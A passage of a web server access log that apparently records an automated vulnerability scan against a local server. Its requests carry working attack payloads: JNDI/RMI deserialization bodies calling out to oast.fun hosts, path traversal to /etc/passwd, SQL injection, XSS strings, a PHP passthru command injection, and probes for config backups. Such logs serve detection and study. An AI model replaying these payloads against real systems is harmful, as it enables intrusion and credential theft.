/owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.160","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://ca285tosmpvbafqg07h05ihzmfk6c1hek.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"ca285tosmpvbafqg07h0rozdnugayqrmz.oast.fun","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://ca285tosmpvbafqg07h0t75hj9yfjrzbd.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.143","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@ca285tosmpvbafqg07h0tj88jyn9fjn7r.oast.fun","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/ca285tosmpvbafqg07h0pyzqwu36cbtq9.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAY3ii39rxKN9MYTMGSofsD6i HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"::1"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://ca285tosmpvbafqg07h0d1dzbarangw37.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /install/install.php?step=4 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @ca285tosmpvbafqg07h0h859nzu66w96c.oast.fun/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ca285tosmpvbafqg07h0pni1s77d535rj.oast.fun:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/includes/configure.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.137","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.140","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.141","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wwwctrl.cgi?action=home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.141","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.124","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.126","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.117","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/xweb500.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.114","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.108","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.110","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.109","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.105","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.096","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.097","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.087","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name 